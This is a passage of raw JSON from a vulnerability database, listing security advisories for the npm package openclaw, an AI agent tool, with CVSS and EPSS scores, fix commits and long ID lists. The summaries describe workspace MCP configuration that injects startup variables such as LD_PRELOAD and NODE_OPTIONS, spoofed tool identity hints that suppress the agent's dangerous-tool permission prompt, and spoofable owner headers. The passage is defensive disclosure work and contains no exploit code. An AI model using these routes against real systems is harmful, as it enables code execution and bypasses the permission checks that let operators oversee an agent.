MCP stdio server env could load dangerous startup variables from workspace config\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace MCP stdio configuration could pass dangerous process-startup environment variables such as `NODE_OPTIONS`, `LD_PRELOAD`, or `BASH_ENV` to the spawned MCP server process. In a malicious workspace, this could make the MCP child load attacker-controlled code when the operator starts a session that uses that MCP server.\n\nThe impact is limited to local/workspace trust boundaries and requires the operator to run OpenClaw in a workspace containing the malicious MCP configuration. Severity is therefore medium, not high/critical.\n\n## Fix\n\nOpenClaw now filters MCP stdio environment entries through the host environment safety denylist before spawning stdio MCP servers.\n\nFix commits:\n\n- `62fa5071896e95edc7f67d1cebc70a2859e283af`\n- `85d86ebc4bf3d2226d39d132a484f4f7a299fa1b`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44995","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01944","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01954","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01946","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44995"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af"},{"reference_url":"https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44995","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44995"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables"},{"reference_url":"https://github.com/advisories/GHSA-mj59-h3q9-ghfh","reference_id":"GHSA-mj59-h3q9-ghfh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mj59-h3q9-ghfh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44995","GHSA-mj59-h3q9-ghfh"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rr6t-1193-ybgz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91642?format=json","vulnerability_id":"VCID-rswr-nd6z-vuhe","summary":"OpenClaw's Conflicting Tool Identity Hints Bypass Dangerous-Tool Prompting\n## Summary\nACP permission resolution trusted conflicting tool identity hints from rawInput and metadata, which could suppress dangerous-tool prompting.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `e4c61723cd2d530680cc61789311d464ab8cdf60`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/acp/client.ts now fails closed when meta, rawInput, and title tool identities conflict instead of trusting spoofable raw input.\n- src/acp/client.test.ts ships regressions for conflicting tool identity hints and dangerous-tool prompting.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35655","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14671","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14635","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14677","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35655"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35655","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35655"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution"},{"reference_url":"https://github.com/advisories/GHSA-74wf-h43j-vvmj","reference_id":"GHSA-74wf-h43j-vvmj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-74wf-h43j-vvmj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35655","GHSA-74wf-h43j-vvmj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rswr-nd6z-vuhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91952?format=json","vulnerability_id":"VCID-ry1r-br3q-2uaw","summary":"OpenClaw: MCP loopback owner context is derived from server-issued bearer tokens\n## Summary\nMCP loopback owner context is derived from server-issued bearer tokens.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe loopback MCP path accepted spoofable owner-context metadata from request headers, which could allow a non-owner loopback client to present itself as owner for owner-gated operations.\n\n## Fix\nThe MCP loopback runtime now issues separate owner and non-owner bearer tokens and derives senderIsOwner exclusively from which token authenticated the request. The spoofable sender-owner header is no longer emitted or trusted.\n\n## Fix Commit(s)\n- 3cb1a56bfc9579a0f2336f9cfa12a8a744332a19\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44118","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01838","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01843","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02646","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44118"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C